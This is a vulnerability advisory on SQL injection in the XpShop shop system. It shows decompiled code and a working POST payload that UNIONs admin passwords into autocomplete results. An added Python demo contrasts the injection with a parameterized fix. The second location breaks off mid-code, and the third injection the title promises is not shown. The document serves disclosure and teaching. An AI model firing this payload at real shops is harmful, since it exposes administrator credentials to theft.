XpShop shop system: 3 SQL injections bundled

Published: 2025-04-13
Revised: 2025-04-13

### Brief description

This is the second batch.

### Details

Vulnerable location: XpShop.WebUI.AutoComplete

```
protected void Page_Load(object sender, EventArgs e)
{
    // GetInput() returns the caller's search string (the pname parameter used in the payload below)
    string input = this.GetInput();
    if (input == "")
    {
        // "非法调用!" = "illegal call"; an empty string is the only condition that is rejected
        base.Response.Write(Utils.ShowMsg("非法调用!"));
    }
    else
    {
        // Any non-empty input goes straight to the lookup and the result is written back to the client
        base.Response.Write(this.GetProductName(input));
        base.Response.End();
    }
}
```

Following GetProductName:

```
private string GetProductName(string pname)
{
    ProductDB productDB = new ProductDB();
    return productDB.GetProductNameByAjax(pname);  // passed through unchanged
}
```

Continuing into GetProductNameByAjax:

```
public string GetProductNameByAjax(string productName)
{
    // productName is concatenated into the LIKE pattern; a single quote in it closes the string literal
    string commandText = "SELECT Top 15 ProductName FROM Product WHERE ProductName Like '%" + productName + "%' ORDER BY Sort DESC";
    DataSet dataSet = XpShopDB.ExecuteDataset(XpShopDB.ConnectionString, CommandType.Text, commandText, null);
    return dataSet.GetXml();  // the result set, including anything UNIONed in, is serialized back to the caller
}
```

Nothing is filtered on the way into the database either, so this is a search-type (LIKE) injection: the input closes the `'%...%'` pattern, appends its own query, and comments out the rest of the original statement.

Payload (POST): `pname=test%' union select password from admin--`

With that value the executed statement becomes `SELECT Top 15 ProductName FROM Product WHERE ProductName Like '%test%' union select password from admin--%' ORDER BY Sort DESC`, and the rows from `admin` come back in the autocomplete XML alongside the product names.

Second vulnerable location: namespace XpShop.WebUI.AJAX

```
private void BindActive()
{
    if...
```
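As an added example (not part of the original report or of XpShop's code), the following Python re-creates the concatenation from GetProductNameByAjax against an in-memory SQLite database and shows the report's payload pulling the admin password out of the search results, next to a parameterized version with LIKE-wildcard escaping that the same payload does not break. The Product and admin tables and their rows are constructed here; the admin table's columns are an assumption based only on the payload's `select password from admin`, and SQLite's `LIMIT` stands in for SQL Server's `TOP`.

```python
import sqlite3

# Constructed stand-ins for the XpShop tables (not the real XpShop schema):
# Product follows the columns named in the decompiled query; the admin table's
# column names are assumed from the payload "select password from admin" only.
SCHEMA = """
CREATE TABLE Product (ProductName TEXT, Sort INTEGER);
CREATE TABLE admin (username TEXT, password TEXT);
INSERT INTO Product VALUES ('test shirt', 2), ('test hat', 1), ('other', 3);
INSERT INTO admin VALUES ('admin', 'e10adc3949ba59abbe56e057f20f883e');
"""

PAYLOAD = "test%' union select password from admin--"  # the payload from the report


def connect():
    """Fresh in-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_vulnerable_sql(product_name):
    """Same string concatenation as GetProductNameByAjax; LIMIT stands in for SQL Server's TOP."""
    return ("SELECT ProductName FROM Product WHERE ProductName Like '%"
            + product_name + "%' ORDER BY Sort DESC LIMIT 15")


def vulnerable_search(conn, product_name):
    """Runs the concatenated query, as the AutoComplete handler does."""
    return [row[0] for row in conn.execute(build_vulnerable_sql(product_name))]


def escape_like(value, escape_char="\\"):
    """Escape LIKE metacharacters so user input matches literally instead of widening the pattern."""
    return (value.replace(escape_char, escape_char * 2)
                 .replace("%", escape_char + "%")
                 .replace("_", escape_char + "_"))


def safe_search(conn, product_name):
    """Parameterized version: the %...% pattern is built in code and bound, never concatenated into SQL."""
    sql = ("SELECT ProductName FROM Product WHERE ProductName LIKE ? ESCAPE '\\' "
           "ORDER BY Sort DESC LIMIT 15")
    pattern = "%" + escape_like(product_name) + "%"
    return [row[0] for row in conn.execute(sql, (pattern,))]


if __name__ == "__main__":
    db = connect()
    print(build_vulnerable_sql(PAYLOAD))
    print("vulnerable:", vulnerable_search(db, PAYLOAD))  # the admin hash appears among product names
    print("fixed:     ", safe_search(db, PAYLOAD))        # the literal payload string matches nothing
```

Two things the comparison makes visible: the injected `--` removes `ORDER BY`/`LIMIT` from the executed statement, so `Top 15` offers no protection, and a bare `%` sent to the vulnerable path dumps the whole table while the escaped, bound version treats it as a literal percent sign. In the C# path the equivalent fix is to bind `productName` as a `SqlParameter` and build the pattern in code; the trailing `null` in the `ExecuteDataset` call on the page looks like the parameter array of a Data Access Application Block style helper, but that is an assumption about the helper's signature that the page does not confirm.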
